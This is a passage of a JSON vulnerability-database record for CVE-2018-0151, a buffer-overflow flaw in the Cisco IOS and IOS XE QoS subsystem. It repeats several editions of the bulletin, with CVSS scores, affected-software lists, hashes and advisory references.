vulnerability. Cisco Bug IDs: CSCvf73881.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:28:53", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}], "rev": 2}, "score": {"modified": "2020-09-21T14:28:53", "rev": 2, "value": 6.3, "vector": "NONE"}}, "hash": "0778049f110087f71138dcf7517a1472d5dded3be9e6913783ef11649a505576", "hashmap": [{"hash": "729f98bc4a65b3e0e24ddfee3d3c4450", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "bb61a0949f8c36262500079f243672e2", "key": "cwe"}, {"hash": "5a4beaa707dc922c28a32dd2f6cc5dff", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "fe2024c81698168a03f21812e0b144ec", "key": "cpe23"}, {"hash": "c721e2fca832eb8373bed0edfa87ce68", "key": "references"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "66009473abc6f61685f134c7f37f69e1", "key": "modified"}, {"hash": "f86bd67f39e3eb736803368e27c00648", "key": "published"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "87eb7723185222259a5c2e045a5512e2", "key": "href"}, {"hash": "23d3bfdb698c819d432a96fc0817674a", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f8e995574fba74f333b92828bacc2ca5", "key": "cvelist"}, {"hash": "9f6e3ad0a156a1fa94c7fbe829990e48", "key": "cpe"}, {"hash": "03541f08cb6464046a994ad08649444d", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "id": "CVE-2018-0151", "lastseen": "2020-09-21T14:28:53", "modified": "2019-12-02T18:54:00", "objectVersion": "1.3", "published": "2018-03-28T22:29:00", "references": ["http://www.securitytracker.com/id/1040582", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "http://www.securityfocus.com/bid/103540", "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"], "reporter": "cve@mitre.org", "title": "CVE-2018-0151", "type": "cve", "viewCount": 34}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:28:53"}, {"bulletin": {"affectedSoftware": [{"name": "cisco ios", "operator": "eq", "version": "everest-16.5.1"}, {"name": "cisco ios_xe", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:cisco:ios:everest-16.5.1", "cpe:/a:cisco:ios_xe:-", "cpe:/o:cisco:ios_xe:-", "cpe:/a:cisco:ios:everest-16.5.1"], "cpe23": ["cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios:everest-16.5.1:*:*:*:*:*:*:*"], "cvelist": ["CVE-2018-0151"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-119"], "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges. The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading. The malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability. Cisco Bug IDs: CSCvf73881.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-10T12:28:17", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}]}, "score": {"modified": "2019-10-10T12:28:17", "value": 6.3, "vector": "NONE"}}, "hash": "6379f99109efd0eaf97cae79bdd636c837d8101a1ff1f855a916a17b2c4dcf68", "hashmap": [{"hash": "48cec8f43ff700f672081508fe3d5099", "key": "cvss3"}, {"hash": "44ef1e805d02d6fbecaa497a3acae25a", "key": "affectedSoftware"}, {"hash": "729f98bc4a65b3e0e24ddfee3d3c4450", "key": "cvss2"}, {"hash": "b249d35fde2f9ee7a5baf3b4c0877b07", "key": "cpe23"}, {"hash": "bb61a0949f8c36262500079f243672e2", "key": "cwe"}, {"hash": "c823f5814458a53a496610d124281201", "key": "cpe"}, {"hash": "c721e2fca832eb8373bed0edfa87ce68", "key": "references"}, {"hash": "f86bd67f39e3eb736803368e27c00648", "key": "published"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4d5b73cad3b3bf46447aeba50ed9a0dc", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "87eb7723185222259a5c2e045a5512e2", "key": "href"}, {"hash": "23d3bfdb698c819d432a96fc0817674a", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f8e995574fba74f333b92828bacc2ca5", "key": "cvelist"}, {"hash": "03541f08cb6464046a994ad08649444d", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "id": "CVE-2018-0151", "lastseen": "2019-10-10T12:28:17", "modified": "2019-10-09T23:31:00", "objectVersion": "1.3", "published": "2018-03-28T22:29:00", "references": ["http://www.securitytracker.com/id/1040582", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "http://www.securityfocus.com/bid/103540", "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"], "reporter": "cve@mitre.org", "title": "CVE-2018-0151", "type": "cve", "viewCount": 23}, "differentElements": ["cpe23", "cvss3", "modified", "cpe", "affectedSoftware"], "edition": 2, "lastseen": "2019-10-10T12:28:17"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "-"}, {"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "16.5.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:cisco:ios_xe:-", "cpe:/o:cisco:ios_xe:16.5.1"], "cpe23": ["cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios_xe:16.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:cisco:ios_xe:16.5.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-0151"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-119"], "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges. The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading. The malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability. Cisco Bug IDs: CSCvf73881.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:52:20", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}], "rev": 2}, "score": {"modified": "2021-02-02T06:52:20", "rev": 2, "value": 6.3, "vector": "NONE"}}, "extraReferences": [{"name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"}, {"name": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "refsource": "CONFIRM", "tags": ["Mitigation", "Vendor Advisory"], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"}, {"name": "1040582", "refsource": "SECTRACK", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securitytracker.com/id/1040582"}, {"name": "103540", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/103540"}], "hash": "4710c6daae6e670d7bafdc501575492406c9206341b6c72e0d3e260fdb166423", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "729f98bc4a65b3e0e24ddfee3d3c4450", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "bb61a0949f8c36262500079f243672e2", "key": "cwe"}, {"hash": "f1f92439c03d28c04043fdd5a2b29b21", "key": "cpeConfiguration"}, {"hash": "5a4beaa707dc922c28a32dd2f6cc5dff", "key": "affectedSoftware"}, {"hash": "fe2024c81698168a03f21812e0b144ec", "key": "cpe23"}, {"hash": "c721e2fca832eb8373bed0edfa87ce68", "key": "references"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "66009473abc6f61685f134c7f37f69e1", "key": "modified"}, {"hash": "f86bd67f39e3eb736803368e27c00648", "key": "published"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "87eb7723185222259a5c2e045a5512e2", "key": "href"}, {"hash": "23d3bfdb698c819d432a96fc0817674a", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f8e995574fba74f333b92828bacc2ca5", "key": "cvelist"}, {"hash": "a16b075a528c5ad71046e31755d8d4af", "key": "extraReferences"}, {"hash": "9f6e3ad0a156a1fa94c7fbe829990e48", "key": "cpe"}, {"hash": "03541f08cb6464046a994ad08649444d", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "id": "CVE-2018-0151", "immutableFields": [], "lastseen": "2021-02-02T06:52:20", "modified": "2019-12-02T18:54:00", "objectVersion": "1.5", "published": "2018-03-28T22:29:00", "references": ["http://www.securitytracker.com/id/1040582", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "http://www.securityfocus.com/bid/103540", "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"], "reporter": "cve@mitre.org", "title": "CVE-2018-0151", "type": "cve", "viewCount": 38}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:52:20"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "-"}, {"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "16.5.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:cisco:ios_xe:-", "cpe:/o:cisco:ios_xe:16.5.1"], "cpe23": ["cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios_xe:16.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:cisco:ios_xe:16.5.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-0151"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-119"], "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges. The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading. The malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability. Cisco Bug IDs: CSCvf73881.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:20:06", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}], "rev": 2}, "score": {"modified": "2020-10-03T13:20:06", "rev": 2, "value": 6.3, "vector": "NONE"}}, "extraReferences": [], "hash": "f00604bbeaeba7956c6d8306f9eb2a3603e00b3cffd0cbb18d12bddc65dd4725", "hashmap": [{"hash": "729f98bc4a65b3e0e24ddfee3d3c4450", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "bb61a0949f8c36262500079f243672e2", "key": "cwe"}, {"hash": "f1f92439c03d28c04043fdd5a2b29b21", "key": "cpeConfiguration"}, {"hash": "5a4beaa707dc922c28a32dd2f6cc5dff", "key": "affectedSoftware"}, {"hash": "fe2024c81698168a03f21812e0b144ec", "key": "cpe23"}, {"hash": "c721e2fca832eb8373bed0edfa87ce68", "key": "references"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "66009473abc6f61685f134c7f37f69e1", "key": "modified"}, {"hash": "f86bd67f39e3eb736803368e27c00648", "key": "published"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "87eb7723185222259a5c2e045a5512e2", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "23d3bfdb698c819d432a96fc0817674a", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f8e995574fba74f333b92828bacc2ca5", "key": "cvelist"}, {"hash": "9f6e3ad0a156a1fa94c7fbe829990e48", "key": "cpe"}, {"hash": "03541f08cb6464046a994ad08649444d", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "id": "CVE-2018-0151", "lastseen": "2020-10-03T13:20:06", "modified": "2019-12-02T18:54:00", "objectVersion": "1.3", "published": "2018-03-28T22:29:00", "references": ["http://www.securitytracker.com/id/1040582", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "http://www.securityfocus.com/bid/103540", "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"], "reporter": "cve@mitre.org", "title": "CVE-2018-0151", "type": "cve", "viewCount": 37}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:20:06"}, {"bulletin": {"affectedSoftware": [{"name": "cisco ios", "operator": "eq", "version": "everest-16.5.1"}, {"name": "cisco ios_xe", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:cisco:ios:everest-16.5.1", "cpe:/a:cisco:ios_xe:-", "cpe:/o:cisco:ios_xe:-", "cpe:/a:cisco:ios:everest-16.5.1"], "cpe23": ["cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios:everest-16.5.1:*:*:*:*:*:*:*"], "cvelist": ["CVE-2018-0151"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-119"], "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges. The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading. The malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability. Cisco Bug IDs: CSCvf73881.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:19:39", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}]}, "score": {"modified": "2019-05-29T18:19:39", "value": 6.3, "vector": "NONE"}}, "hash": "c8a2ef3463063ea1f4701db19e63a4b69fb4cf40bf3663e7d5b49eca57281972", "hashmap": [{"hash": "48cec8f43ff700f672081508fe3d5099", "key": "cvss3"}, {"hash": "44ef1e805d02d6fbecaa497a3acae25a", "key": "affectedSoftware"}, {"hash": "729f98bc4a65b3e0e24ddfee3d3c4450", "key": "cvss2"}, {"hash": "b249d35fde2f9ee7a5baf3b4c0877b07", "key": "cpe23"}, {"hash": "bb61a0949f8c36262500079f243672e2", "key": "cwe"}, {"hash": "c823f5814458a53a496610d124281201", "key": "cpe"}, {"hash": "c721e2fca832eb8373bed0edfa87ce68", "key": "references"}, {"hash": "f86bd67f39e3eb736803368e27c00648", "key": "published"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "87eb7723185222259a5c2e045a5512e2", "key": "href"}, {"hash": "23d3bfdb698c819d432a96fc0817674a", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f8e995574fba74f333b92828bacc2ca5", "key": "cvelist"}, {"hash": "03541f08cb6464046a994ad08649444d", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "ba033945a7cf2853f21cf46d10dddb9b", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "id": "CVE-2018-0151", "lastseen": "2019-05-29T18:19:39", "modified": "2018-04-20T15:41:00", "objectVersion": "1.3", "published": "2018-03-28T22:29:00", "references": ["http://www.securitytracker.com/id/1040582", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "http://www.securityfocus.com/bid/103540", "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"], "reporter": "cve@mitre.org", "title": "CVE-2018-0151", "type": "cve", "viewCount": 14}, "differentElements": ["modified"], "edition": 1, "lastseen": "2019-05-29T18:19:39"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "5a4beaa707dc922c28a32dd2f6cc5dff"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "9f6e3ad0a156a1fa94c7fbe829990e48"}, {"key": "cpe23", "hash": "fe2024c81698168a03f21812e0b144ec"}, {"key": "cpeConfiguration", "hash": "72f40f3ee6c74b52b469141539141c81"}, {"key": "cvelist", "hash": "f8e995574fba74f333b92828bacc2ca5"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "cvss2", "hash": "729f98bc4a65b3e0e24ddfee3d3c4450"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "bb61a0949f8c36262500079f243672e2"}, {"key": "description", "hash": "03541f08cb6464046a994ad08649444d"}, {"key": "extraReferences", "hash": "a16b075a528c5ad71046e31755d8d4af"}, {"key": "href", "hash": "87eb7723185222259a5c2e045a5512e2"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "66009473abc6f61685f134c7f37f69e1"}, {"key": "published", "hash": "f86bd67f39e3eb736803368e27c00648"}, {"key": "references", "hash": "c721e2fca832eb8373bed0edfa87ce68"}, {"key": "reporter", "hash": "d23be448f90fb7586ac4c068c9a1027b"}, {"key": "title", "hash": "23d3bfdb698c819d432a96fc0817674a"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "606da1117333133295cf2d7dd073ccddc56344f9bc1eaadcb89263efd1f2bc95", "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20180328-QOS"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "720296.PRM", "CISCO-SA-20180328-QOS-IOSXE.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889900"]}, {"type": "ics", "idList": ["ICSA-18-107-03"]}], "modified": "2021-04-23T00:24:13", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-04-23T00:24:13", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/o:cisco:ios_xe:-", "cpe:/o:cisco:ios_xe:16.5.1"], "affectedSoftware": [{"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "-"}, {"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "16.5.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios_xe:16.5.1:*:*:*:*:*:*:*"], "cwe": ["CWE-119"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:cisco:ios_xe:16.5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"}, {"name": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "refsource": "CONFIRM", "tags": ["Mitigation", "Vendor Advisory"], "url": 